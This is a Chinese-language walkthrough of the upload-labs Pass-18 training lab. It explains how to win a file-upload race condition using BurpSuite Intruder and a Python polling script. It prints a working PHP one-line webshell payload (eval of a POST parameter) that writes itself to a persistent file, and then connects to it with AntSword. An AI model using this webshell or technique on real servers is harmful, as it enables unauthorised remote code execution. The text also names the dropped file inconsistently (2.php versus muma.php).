目录
结合upload-labs-Pass18
破解思路
存在条件竞争漏洞,大概意思就是如果能在上传的一句话木马被删除之前访问成功了,那么就可以拿shell了
绕过过程
- 不断上传文件,在文件还没被删除前去读取文件,
- 若上传内容为
<?php fputs(fopen('muma.php','w'),'<?php @eval($_POST["pass"])?>');?>
, - 则还没被删除前去读取文件,解析之后会写入一个内容为
<?php @eval($_POST["pass"])?>
的2.php
文件。 - 使用BurpSuite的Intruder不断上传文件并不断访问所上传的文件。
- 注:
"pass"
一定要双引号,不然单引号之间乱了。
muma.php
<?php fputs(fopen('muma.php','w'),'<?php @eval($_POST[pass]);?>'); ?>
打开pyhon脚本
利用pyhon脚本持续访问目标文件
打开Burpsuite
利用Burpsuite持续上传文件
上传文件成功并连接
python脚本连接成功,说明文件上传成功,这时使用蚁剑连接。即可控制靶机